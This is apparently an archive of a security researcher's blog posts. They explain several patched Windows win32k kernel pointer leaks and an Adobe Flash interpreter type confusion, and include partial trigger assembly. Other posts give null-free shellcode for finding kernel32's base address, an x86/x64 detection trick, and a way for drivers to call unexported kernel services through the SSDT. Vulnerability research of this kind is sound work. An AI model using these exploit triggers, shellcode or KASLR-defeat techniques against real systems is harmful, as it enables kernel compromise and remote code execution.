Archive for the ‘Security’ Category

Win32k – Smash The Ref

Wednesday, April 1st, 2020

After a year in the making, I’m happy to publish my biggest research so far. It’s a whole bug class of vulnerabilities already patched by MSFT recently.

You can find all the POCs and the paper in my github.

Enjoy

The case of DannyDinExec – CVE-2019-1440

Wednesday, November 13th, 2019

Yet another pointer leak in the win32k driver, this time it’s a cool bug. It’s inside the DDE (Dynamic Data Exchange) component.

  1. It’s possible creating DDE objects (whatever that means) and each gets a corresponding newly created kernel window by using the NtUserDdeInitialize syscall.
  2. Internally, it adds the new DDE object to a global linked list of all such objects.
  3. In certain cases, it needs to update all DDE windows that some event occurred by sending them a message (by xxxSendMessage). Alas, this message encodes a kernel heap pointer in the LPARAM argument.

Ah ha, I thought to myself: if I manage to get the message routed to a user-mode window procedure, then the LPARAM will reveal sensitive kernel info. Profit.
Looking at the function xxxCsEvent which is the workhorse of step #3:

  1. It first converts the linked list into an array of HWNDs (not pointers, but the window-identifier) – Problem #1
  2. It then walks over the array and verifies the HWND still represents an existing window, and then it sends a DDE message to that window procedure – Problem #2

It looks something like that (which is super simplified):

count = 0;
// Query the list depth.
for (p = g_listHead; p != NULL; p = p->next) count++;
array = malloc(sizeof(HWND) * count);
// Convert the list into an array of handles.
for (i = 0, p = g_listHead; p != NULL; p = p->next, i++)
   array[i] = p->pwnd->hwnd;
// Iterate over the array and dispatch.
for (i = 0; i < count; i++)
{
  pwnd = verifywindow(array[i]);
  if (pwnd != NULL)
    xxxSendMessage(pwnd, WM_DDE_MSG, 0, kernel_ptr);
}

The way to attack this algorithm is by understanding that the kernel windows that belong to the DDE objects can be replaced during the first callback to user-mode, so the second iteration (given we created 2 DDE objects) will send a message to a window that we created from user-mode, that has exactly the same HWND (defeating problem #1 and #2), so we get the message directly from kernel, because window verification passes.

Wait, what???
If we could get the message on the first iteration to user-mode, then it's a game over already. The catch is that we can't set a user-mode window-procedure for a kernel DDE window. But we don't need to, as the DDE window procedure (xxxEventWndProc) anyway calls back to user-mode on its own by calling ClientEventCallback. Once we hook that function we're good to get control back to user-mode in the middle of the first iteration.

Now back in user-mode, we can destroy the next iterated DDE object, and it will destroy the corresponding window too, whose HWND we already know.
And now, all we have to do is to brute force to create a window that will have the same HWND, to make the verifywindow() succeed, and then xxxSendMessage sends the raw pointer to us :)

Brute forcing a HWND is very simple, because given the HWND encoding, one has to iterate exactly 16 bits space (hence, loop 0x10000 times) to get the same HWND again (over simplified again, but would work 99% of the cases). Without going into all details.

The following diagram tries to explain the flow that the attacker has to go through in order to exploit described code above:

A POC can be found on github.

Integer or pointer? CVE-2019-1071

Sunday, November 10th, 2019

A few months ago I found an info-leak in the win32k driver. It was in the xxxCreateWindowEx (CreateWindow API) and it leaked a kernel pointer to (the desktop heap of) a menu object.

The desktop heap is where all UI objects are allocated in kernel and it’s mapped to user address space too. Meaning that if one finds out the kernel address of an object, and she already got the address in user space, then it reveals the delta between the mappings (which is a secret). And now all objects addresses are known.

Note that in the beginning win32k used to map the desktop heap which revealed kernel pointers (because kernel objects contained kernel pointers in them) and it was recently fixed to harden breaking KASLR. So now such a pointer leak is very helpful for exploitation.

The origin of the bug is in the fact that the same field used for a child-window-ID is also used for a menu pointer (through ‘union’) in the window structure in the kernel. Back in the beginning of the 90’s saving memory space was sacred and this very specific optimization costed MS a few vulnerabilities already.

If you look carefully in MSDN at the CreateWindow API you will notice the HMENU argument, which can also be an ID (or an integer eventually). The bug is a confusion between the time we create the window and the time it queries for a menu.

When we create the window we pass NULL for the HMENU, however the class we use specifies a menu resource through the WNDCLASS.lpszMenuName field. Making the window creation code calling back to user-mode (#1 in snippet) to create a menu for that menu name. While back in user-mode we SetWindowLong() the same window to become a child window (WS_CHILD), meaning that from now on that field should be interpreted as an ID/integer. And now back into the kernel at xxxCreateWindow the following if statement (#2) gets confused.

if (window-not-child &&
    NULL == pmenu &&
    NULL != cls.lpszMenuName)
{
  pmenu = xxxClientLoadMenu(cls.lpszMenuName); ///// #1
}
if (window is child) ///// #2
{
  pwnd->menu = pmenu; ///// #3
  // By now pmenu should be an ID, but it's really a pointer!
}
else
{
  HMAssignmentLock(&pwnd->menu, pmenu);
}

And at last, at #3 our menu is really a pointer and not an ID! Again, the code assumes that if the window is a child then the pmenu variable is always an ID and if the window is not a child, then pmenu is really a pointer to a menu (hence the else with locking the object…).
Now since the window is really a child (as we changed it from user-mode from the xxx callback) and the menu is interpreted as an ID, we managed to leak a kernel pointer to a window-ID.

Finally, it’s accessible just by querying:
GetWindowLongPtr(hWnd, GWL_ID).

Code can be found on my github. Bonus – there’s also a NULL deref bug hidden inside that is exploitable on Windows versions that can map the NULL page.

Yippi

Flash News

Tuesday, November 13th, 2018

TLDR; There’s a bug in Adobe Flash. [It got allocated with CVE-2018-15981]
The interpreter code of the Action Script Virtual Machine (AVM)
does not reset a with-scope pointer when an exception is caught,
leading later to a type confusion bug, and eventually to a remote code execution.

First, we will start with general information on how the Flash engine, AVM, works,
because I find it fascinating and important for understanding the matter at hand.

Flash runs code by either JITting it or by interpreting it. The design of the engine is to verify the ActionScript3 (AS in short) code and the meta data only once upon loading a (SWF) file and then to run the code while trusting it (without re-validation). This improves significantly the performance of running Flash applications. This affects instructions, they are also designed to have operands as part of their (fixed) byte code. For example, the pushstring instruction will take an index number into the strings array that is defined in the SWF file and it can only point to a valid entry in that array (if it won’t, the verifier component will reject this file from being run). Later, in the JITted code or interpreter, it will assume that the verifier already confirmed this instruction with its operand and just load the requested entry and push it to the stack, as opposed to reading the entry from a register, which can be dynamically set in runtime and thus require a runtime check.
The AS code also supports a stack and registers, and since it is a dynamic language that lets one define members and properties (key/value pairs) on the fly, the engine will have to search for them every time, and to coerce their types too to the expected types; of a function argument for example. This coercion is done all over the place and is the heart of making sure types are safe all over their use. The coercion will even go further and change a type to another expected type automatically to be valid for that function call.

When the AVM runs code, the relevant part in the verifier is doing its important job by following and analyzing statically all instructions by simulating them and it verifies the types of all registers, variables on the stack and more, in order to see how they are about to be used, and if it sees they are used as invalid/wrong types, it will fail loading the file in advance. Otherwise it will just let the operation continue normally with assuming the type is correct and expected. Imagine there’s a function prototype that receives an integer argument:
function foo(bar:int):void {}
but you pass a string to it instead:
foo("imahacker")
then the verifier won’t like it and will fail this code from running. In other times, if you pass an object which has a default-value method, it might invoke it in run time to hopefully get an integer, but it will make sure in runtime that it really got an integer… so some of the checks also happen in runtime when it can’t know in static time (so yes, it’s okay to pass object as an integer).

Another trait of AS is what make properties dynamic, or technically how they are searched for every time. Starting with local scope and going to higher scopes in the hierarchy up to the globals’ scope. This is all documented. It hurts to know that much searching is done in order to find the right property in the scope chain every time code accessed it.
Perhaps Flash gives full OOP abilities on top of a dynamic language but when we take a look at the open source code of the AVM, it’s really horrifying, code dups all over instead of encapsulation, or the same part of the SWF will be parsed in multiple places and each time different functionality will be applied to it and other horrors…that we, security researchers, love.

Anyway, Flash will prefer to use the JIT as much as possible to run actual code, because it’s faster. It will emit real code of the target hosting architecture while doing the same pass for verifying the code. And it can even JIT a function while it’s already running inside the interpreter and continue from that state, impressive. However, remember that the interpreter is always used to run constructors of a user class defined in the SWF. And this is how we make sure our code will get to run inside the vulnerable interpreter. The engine can also handle exceptions on its own (try-catch and throw), employing setbuf and jmpbuf, so if an exception is raised inside an AS function, the interpreter implementation or the JIT infrastructure itself will catch it and pass it along the
next handler in the chain until a correct AS catch-handler with the right type will be found and execution will resume inside the interpreter, in our case, from that spot of the catch handler.
Basically, if you try to make an infinite call-recursion to itself, you won’t see a native (Windows/Linux) exception thrown, but rather the interpreter checks the size of its own stack artificially in some spots and will emulate its own stack overflow/underflow exceptions. If you will try to do an integer division by zero, then they already handle it themselves in the div instruction handler, etc. It’s pretty much robust and a closed system. There are many other interesting Flash internals topics, like atoms, the garbage collector, JIT, etc, but that won’t be covered today.

Now that you have some idea of how the AVM works.
Let’s talk business.
In AS you can use the keyword “with” to be lazy and omit the name of the instance whose members you want to access.
That’s normal in many scripting languages, but I will show it nevertheless.
For example, instead of doing:
point.x = 0x90;
point.y = 0xc3;
point.z = 0xcd;
It can be written as following using the “with” keyword:
with (point)
{
 x = 0x90;
 y = 0xc3;
 z = 0xcd;
}
For each assignment the interpreter will first use the with-scope if it’s set to avoid searching the full chain, once it got the property it will make the assignment itself. So, there’s an actual function that looks up the property in the scopes array of a given function. The origin of the bug occurs once an exception is thrown in the code, the catch handler infrastructure inside the interpreter will NOT reset its with-scope variable, so actually it will keep looking for properties in that with-scope in the next times. But (a big BUTT) the verifier, while simulating the exception catching,
will reset its own state for the with-scope. And this, ladies and gentlemen, leads to a discrepancy between the verifier and the interpreter. Thus, opens a type confusion attack. Pow pow pow. In other words, we managed to make the interpreter do one thing, while the verifier thinks it does another (legit) thing.

This is how we do it:
In the beginning we load the with-scope with a legit object. We later raise a dummy exception and immediately catch it ourselves. Now, the interpreter will still use the with-object we loaded, although the verifier thinks we don’t use a with-scope anymore, we will query for a member with a certain controlled type from the with-scope again and now use it as an argument for a function or an operand for an instruction that expects something else, and voila we got a type confusion. Remember, the verifier will think we use a different property that matches the expected type we want to forge and thus won’t fail loading our file.

Let’s see the bug in the interpreter code first, and then an example on how to trigger it.
At line 796, you can see:
register Atom* volatile withBase = NULL;

That’s the local variable of the interpreter function that we’re messing up with (pun intended)! Note that technically the withBase is used as a pointer-offset to the scopeBase array
(that’s all the scopes that the function loaded on its scopes stack), but that doesn’t change the logic or nature of the bug, just how we tailor the bits and bytes to trigger the bug, if you are interested to understand this confusing description, you will have to read findproperty implementation. And at line 2347 which is the handler of the findproperty instruction:
*(++sp) = env->findproperty(scope, scopeBase, scopeDepth, multiname, b1, withBase);

See they pass the withBase to the findproperty, that’s the one to look up a property in the scope chain. This is where we will make it return a different property,
while the verifier will think it returned a valid typed property from our object. Now, we can use throw keyword to raise an exception, and the catch handler infrastructure at line 3540, will handle it.
CATCH (Exception *exception)

You can see that it will reset many variables of its own state machine, and set the interpreter’s PC (program counter, or next instruction’s address) to start with the target handler’s address, etc.
But they forgot to reset the withBase. I bet they didn’t forget, and they did it for performance sake, their code has tons of micro and obsessive optimizations, that today a good engineer wouldn’t just do. You can also note that they clear scopeBase array only in debugger mode (line 3573), and that used to be another bug, until they realized they better do it always.
They used to have many bugs around the scope arrays in the interpreter, but they’re all fixed now in the binaries, since we look at an old source code you can still find them.

Finally, let’s see how we would maneuver this altogether.
I used the great rabcdasm tool to assemble this.
This code is partial and only the relevant guts of the triggering exploit.

; All functions start with some default scope, we keep it too.
getlocal0
pushscope

; We create a property with the name "myvar" that is really an object itself of type NewClass2.
; This property which is inside the object/dictionary will be the one the verifier sees.
getlocal0
findpropstrict QName(PackageNamespace(""), "NewClass2")
constructprop QName(PackageNamespace(""), "NewClass2"), 0
initproperty QName(PackageInternalNs(""), "myvar")

; We push a second item on the scope array,
; to make the withBase point to its location in the scopes array.
; Note this array contains both normal scope objects and with scope objects.
getlocal0
pushwith

; Now we throw an exception, just to make the interpreter keeping a stale withBase.
L10:
pushbyte 1
throw
L12:
nop
L16:
; This is our catch handler, we continue to do our thing.
; Now note that the withBase points to the second item on the scopes array,
; which currently won't be used until we put something there (because the scopes array is empty).

; Put back the first scope on the scope stack, so we can work normally.
getlocal0
pushscope

; Now we're going to create an object which has one property of an integer type and its name is "myvar".
; This property will be returned instead of the correct one from the object we created above.
pushstring "myvar"
; Next is the attacking type to be really used instead!!!1@ :)
; This is the actual value that will be fetched by getproperty instruction below.
pushint 534568
; Create an object with 1 property (name, value pair on the stack)
newobject 1
; Mark it as an object type.
coerce QName(PackageNamespace(""), "Object")

; And now push it to the scope, note we don't use pushwith this time!
; Because we want to keep old value, otherwise verifier will be on to us,
; This makes our object that we just created as the new with-scope object.
pushscope

; Now, findproperty et al will actually scan for our property using the withBase in practice,
; which has our fake object that we recently created,
; containing a property with the "myvar" name, with a different type from what the verifier sees
; (Remember - it sees the object above, in the beginning of this function).
findproperty Multiname("myvar", [PackageInternalNs(""), PackageNamespace("")])
getproperty Multiname("myvar", [PackageInternalNs(""), PackageNamespace("")])

; Now practically on the stack we have an integer,
; instead of an object, and next executing getslot which assumes an object (NewClass2) is in the stack,
; will crash miserably!
getslot 1

returnvoid

The triggering code can be done with many different variations. Instructions like nextvlaue can be targeted too, because it doesn’t verify its operands in runtime and can leak pointers etc.
When I found this bug at first, I thought there’s small chance it’s a real bug. Particularly, I had my doubts, because the chances to have a forgotten/dangling with-scope is high in a normal Flash application. So how come nobody encountered this bug before as a misbehavior of their app? E.G. by getting a wrong variable, etc. Apparently, the combination to cause this scenario accurately is not that high after all.

Good bye Flash, you’ve been kind…

Exploiting Android Stagefright with ASLR Bypass

Friday, March 4th, 2016

Everybody knows that exploiting remote code execution vulnerabilities is a real challenge. Rumors say it that some entities around the world managed to do it but AFAIK, nobody published anything, as they might use it for gathering intelligence. Israeli NorthBit security consultancy company researched the vulnerability and managed to bypass the ASLR through exploiting the bug using a browser on Android 5.0 and 5.1 for Samsung devices.

For more details see http://tinyurl.com/h4deqjg

Kernel Exploits

Monday, November 21st, 2011

Hey

I’m uploading a presentation of a good friend, Gilad Bakas, who has just spoken in Ruxcon in Australia.

Get it now: Kernel Exploits

Enjoy

isX64 Gem

Wednesday, July 13th, 2011

I needed a multi-arch shellcode for both x86 and x64 in the same code. Suppose you want to attack a platform, which can either be x86 or x64 where you don’t know in advance which it is. The problem is which version you really need to use at runtime then, right?

This is a tiny trick I’ve been using for a long while now which tells whether you run on x64 or not:

XOR EAX, EAX
INC EAX ; = DB 0x40
NOP
JZ x64_code
x86_code:
bits 32
.
.
.
RET
x64_code:
bits 64
.
.

The idea is very simple, since x64 and x86 share most opcodes’ values, there is a small in-similarity with the range of 0x40-0x50, in x86 it used for one byte INC and DEC opcodes. Since there’re 8 GPRs (General Purpose Register), and 2 opcodes, it spans over the whole range of 0x40-0x50.
Now when AMD64’s ISA (Instruction Set Architecture) was designed, they added another set of 8 GPRs, making it a total of whopping 16 GPRs. In a world where x86 ruled, you only needed 3 bits in the ModRM byte (some byte in the instruction that tells the processor how to read its operands) to access a specific register from 0 to 8. With the new ISA, an extra bit was required in order to be able to address all 16 registers. Therefore, a new prefix (called the REX prefix) was added to solve this problem with an extra bit (and there’s more to it, not relevant for now). The new prefix used the range of 0x40-0x50, thus eliminating old one byte INC/DEC (no worries however, now compilers use the 2 bytes existent variation for these instructions).

Back to our assembly code, it depends on the fact that in x86 the INC EAX, really increments EAX by one, and so it will become 1 if the code runs on x86. And when it’s run on x64, it becomes a prefix to the NOP instruction, which doesn’t do anything anyway. And hence, EAX stays zero. Just a final note for the inexperienced that in x64, operations on 32 bit registers are automatically promoted to 64 bit registers, so RAX is also 0.

Finding Kernel32 Base Address Shellcode

Thursday, July 7th, 2011

Yet another one…
This time, smaller, more correct, and still null-free.
I looked a bit at some shellcodes at exploit-db and googled too, to see whether anyone got a smaller way to no avail.

I based my code on:
http://skypher.com/index.php/2009/07/22/shellcode-finding-kernel32-in-windows-7/
AFAIK, who based his post on:
http://blog.harmonysecurity.com/2009_06_01_archive.html

And this is my version:

00000000 (02) 6a30                     PUSH 0x30
00000002 (01) 5e                       POP ESI
; Use DB 0x64; LODSD
00000003 (02) 64ad                     LODS EAX, [FS:ESI]
00000005 (03) 8b700c                   MOV ESI, [EAX+0xc]
00000008 (03) 8b761c                   MOV ESI, [ESI+0x1c]
0000000b (03) 8b5608                   MOV EDX, [ESI+0x8]
0000000e (04) 807e1c18                 CMP BYTE [ESI+0x1c], 0x18
00000012 (02) 8b36                     MOV ESI, [ESI]
00000014 (02) 75f5                     JNZ 0xb

The tricky part was how to read from FS:0x30, and the way I use is the smallest one, at least from what I checked.
Another issue that was fixed is the check for kernel32.dll, usually the variation of this shellcode checks for a null byte, but it turned out to be bogous on W2k machines, so it was changed to check for a null word. Getting the shellcode by a byte or two longer.

This way, it’s only 22 bytes, it doesn’t assume that kernel32.dll is the second/third entry in the list, it actually loops till it finds the correct module length (len of ‘kernel32.dll’ * 2 bytes). Also since kernelbase.dll can come first and that renders lots of implementations of this technique unusable.
And obviously the resulting base address of kernel32.dll is in EDX.

Enjoy

[Update July 9th:]
Here’s a link to an explanation about PEB/LDR lists.
See first comment for a better version which is only 17 bytes.

Calling System Service APIs in Kernel

Wednesday, January 26th, 2011

In this post I am not going to shed any new light about this topic, but I didn’t find anything like this organized in one place, so I decided to write it down, hope you will find it useful.

Sometimes when you develop a kernel driver you need to use some internal API that cannot be accessed normally through the DDK. Though you may say “but it’s not an API if it’s not officially exported and supported by MS”. Well that’s kinda true, the point is that some functions like that which are not accessible from the kernel, are really accessible from usermode, hence they are called API. After all, if you can call NtCreateFile from usermode, eventually you’re supposed to be able to do that from kernel, cause it really happens in kernel, right? Obviously, NtCreateFile is an official API in the kernel too.

When I mean using system service APIs, I really mean by doing it platform/version independent, so it will work on all versions of Windows. Except when MS changes the interface (number of parameters for instance, or their type) to the services themselves, but that rarely happens.

I am not going to explain how the architecture of the SSDT and the transitions from user to kernel or how syscalls, etc work. Just how to use it to our advantage. It is clear that MS doesn’t want you to use some of its APIs in the kernel. But sometimes it’s unavoidable, and using undocumented API is fine with me, even in production(!) if you know how to do it well and as robust as possible, but that’s another story. We know that MS doesn’t want you to use some of these APIs because a) they just don’t export it in kernel on purpose, that is. b) starting with 64 bits versions of Windows they made it harder on purpose to use or manipulate the kernel, by removing previously exported symbols from kernel, we will get to that later on.

Specifically I needed ZwProtectVirtualMemory, because I wanted to change the protection of some page in the user address space. And that function isn’t exported by the DDK, bummer. Now remember that it is accessible to usermode (as VirtualProtectMemory through kernel32.dll syscall…), therefore there ought to be a way to get it (the address of the function in kernel) in a reliable manner inside a kernel mode driver in order to use it too. And this is what I’m going to talk about in this post. I’m going to assume that you already run code in the kernel and that you are a legitimate driver because it’s really going to help us with some exported symbols, not talking about shellcodes here, although shellcodes can use this technique by changing it a bit.

We have a few major tasks in order to achieve our goal: Map the usermode equivalent .dll file. We need to get the index number of the service we want to call. Then we need to get the base address of ntos and the address of the (service) table of pointers (the SSDT itself) to the functions in the kernel. And voila…

The first one is easy both in 32 and 64 bits systems. There are mainly 3 files which make the syscalls in usermode, such as: ntdll, kernel32 and user32 (for GDI calls). For each API you want to call in kernel, you have to know its prototype and in which file you will find it (MSDN supplies some of this or just Google it). The idea is to map the file to the address space as an (executable) image. Note that the cool thing about this mapping is that you will get the address of the required file in usermode. Remember that these files are physically shared among all processes after boot time (For instance, addresses might change because of ASLR but stay consistent as long as the machine is up). Following that we will use a similar functionality to GetProcAddress, but one that you have to write yourself in kernel, which is really easy for PE and PE+ (64 bits).

Alright, so we got the image mapped, we can now get some usermode API function’s address using our GetProcAddress, now what? Well, now we have to get the index number of the syscall we want. Before I continue, this is the right place to say that I’ve seen so many approaches to this problem, disassemblers, binary patterns matching, etc. And I decided to come up with something really simple and maybe new. You take two functions that you know for sure that are going to be inside kernel32.dll (for instance), say, CreateFile and CloseHandle. And then simply compare byte after byte from both functions to find the first different byte, that byte contains the index number of the syscall (or the low byte out of the 4 bytes integer really). Probably you have no idea what I’m talking about, let me show you some usermode API’s that directly do syscalls:

XP SP3 ntdll.dll
B8 25 00 00 00                    mov     eax, 25h        ; NtCreateFile
BA 00 03 FE 7F                    mov     edx, 7FFE0300h
FF 12                             call    dword ptr [edx]
C2 2C 00                          retn    2Ch

B8 19 00 00 00                    mov     eax, 19h        ; NtClose
BA 00 03 FE 7F                    mov     edx, 7FFE0300h
FF 12                             call    dword ptr [edx]
C2 04 00                          retn    4

Vista SP1 32 bits ntdll.dll

B8 3C 00 00 00                    mov     eax, 3Ch        ; NtCreateFile
BA 00 03 FE 7F                    mov     edx, 7FFE0300h
FF 12                             call    dword ptr [edx]
C2 2C 00                          retn    2Ch

B8 30 00 00 00                    mov     eax, 30h        ; NtClose
BA 00 03 FE 7F                    mov     edx, 7FFE0300h
FF 12                             call    dword ptr [edx]
C2 04 00                          retn    4

Vista SP2 64 bits ntdll.dll

4C 8B D1                          mov     r10, rcx        ; NtCreateFile
B8 52 00 00 00                    mov     eax, 52h
0F 05                             syscall
C3                                retn

4C 8B D1                          mov     r10, rcx        ; NtClose
B8 0C 00 00 00                    mov     eax, 0Ch
0F 05                             syscall
C3                                retn

2008 sp2 64 bits ntdll.dll

4C 8B D1                          mov     r10, rcx        ; NtCreateFile
B8 52 00 00 00                    mov     eax, 52h
0F 05                             syscall
C3                                retn

4C 8B D1                          mov     r10, rcx        ; NtClose
B8 0C 00 00 00                    mov     eax, 0Ch
0F 05                             syscall
C3                                retn

Win7 64bits syswow64 ntdll.dll

B8 52 00 00 00                    mov     eax, 52h        ; NtCreateFile
33 C9                             xor     ecx, ecx
8D 54 24 04                       lea     edx, [esp+arg_0]
64 FF 15 C0 00 00+                call    large dword ptr fs:0C0h
83 C4 04                          add     esp, 4
C2 2C 00                          retn    2Ch

B8 0C 00 00 00                    mov     eax, 0Ch        ; NtClose
33 C9                             xor     ecx, ecx
8D 54 24 04                       lea     edx, [esp+arg_0]
64 FF 15 C0 00 00+                call    large dword ptr fs:0C0h
83 C4 04                          add     esp, 4
C2 04 00                          retn    4

These are a few snippets to show you how the syscall function templates look like. They are generated automatically by some tool MS wrote and they don’t change a lot as you can see from the various architectures I gathered here. Anyway, if you take a look at the bytes block of each function, you will see that you can easily spot the correct place where you can read the index of the syscall we are going to use. That’s why doing a diff on two functions from the same .dll would work well and reliably. Needless to say that we are going to use the index number we get with the table inside the kernel in order to get the corresponding function in the kernel.

This technique gives us the index number of the syscall of any exported function in any one of the .dlls mentioned above. This is valid both for 32 and 64 bits. And by the way, notice that the operand type (=immediate) that represents the index number is always a 4 bytes integer (dword) in the ‘mov’ instruction, just makes life easier.

To the next task, in order to find the base address of the service table or what is known as the system service descriptor table (in short SSDT), we will have to get the base address of the ntoskrnl.exe image first. There might be different kernel image loaded in the system (with or without PAE, uni-processor or multi-processor), but it doesn’t matter in the following technique I’m going to use, because it’s based on memory and not files… This task is really easy when you are a driver, means that if you want some exported symbol from the kernel that the DDK supplies – the PE loader will get it for you. So it means we get, without any work, the address of any function like NtClose or NtCreateFile, etc. Both are inside ntos, obviously. Starting with that address we will round down the address to the nearest page and scan downwards to find an ‘MZ’ signature, which will mark the base address of the whole image in memory. If you’re afraid from false positives using this technique you’re welcome to go further and check for a ‘PE’ signature, or use other techniques.

This should do the trick:

PVOID FindNtoskrnlBase(PVOID Addr)
{
    /// Scandown from a given symbol's address.
    Addr = (PVOID)((ULONG_PTR)Addr & ~0xfff);
    __try {
        while ((*(PUSHORT)Addr != IMAGE_DOS_SIGNATURE)) {
            Addr = (PVOID) ((ULONG_PTR)Addr - PAGE_SIZE);
        }
        return Addr;
    }
    __except(1) { }
    return NULL;
}

And you can call it with a parameter like FindNtoskrnlBase(ZwClose). This is what I meant that you know the address of ZwClose or any other symbol in the image which will give you some “anchor”.

After we got the base address of ntos, we need to retrieve the address of the service table in kernel. That can be done using the same GetProcAddress we used earlier on the mapped user mode .dll files. But this time we will be looking for the “KeServiceDescriptorTable” exported symbol.

So far you can see that we got anchors (what I call for a reliable way to get an address of anything in memory) and we are good to go, this will work in production without the need to worry. If you wanna start the flame war about the unlegitimate use of undocumented APIs, etc. I’m clearly not interested. :)
Anyway, in Windows 32 bits, the latter symbol is exported, but it is not exported in 64 bits! This is part of the PatchGuard system, to make life harder for rootkits, 3rd party drivers doing exactly what I’m talking about, etc. I’m not going to cover how to get that address in 64 bits in this post.

The KeServiceDescriptorTable is a table that holds a few pointers to other service tables which contain the real addresses of the service functions the OS supplies to usermode. So a simple dereference to the table and you get the pointer to the first table which is the one you are looking for. Using that pointer, which is really the base address of the pointers table, you use the index we read earlier from the required function and you got, at last, the pointer to that function in kernel, which you can now use.

The bottom line is that now you can use any API that is given to usermode also in kernelmode and you’re not limited to a specific Windows version, nor updates, etc. and you can do it in a reliable manner which is the most important thing. Also we didn’t require any special algorithms nor disassemblers (as much as I like diStorm…). Doing so in shellcodes make life a bit harder, because we had the assumption that we got some reliable way to find the ntos base address. But every kid around the block knows it’s easy to do it anyway.

Happy coding :)

References I found interesting about this topic:
http://j00ru.vexillium.org/?p=222
http://alter.org.ua/docs/nt_kernel/procaddr/

http://uninformed.org/index.cgi?v=3&a=4&p=5

And how to do it in 64 bits:

http://www.gamedeception.net/threads/20349-X64-Syscall-Index

New Project – ReviveR

Saturday, September 25th, 2010

Hey all,

long time haven’t posted. I’m kinda busy with lots of stuff.
Anyway I just wanted to let you know that I’m starting to work on the sequel of diStorm, you guessed it right… A reversing studio!
Unlike what many people said, the core is going to be written in C++, the GUI is going to be written per OS. No thanks, QT. Top goals are performance, scripting, good UI and most important good analysis capabilities. Obviously it’s going to be open source, cross platform. For a start, it will support only x86 and AMD64 and PE file format, maybe ELF too, though not my priority. I’m not sure about a debugger yet, but it will probably be implemented later. GUI is going to be written using WPF under C#, just to give you an idea.

My main interests are performance and binary code analysis algorithms.

If there are highly skilled programmers who wish to help, please contact me.
For now it seems we are a group of 4 coders, I’m still not going to publish their names, until everything is settled.

Anyway, design is taking place nowadays. This is your time for suggesting new features and ideas.

Big good luck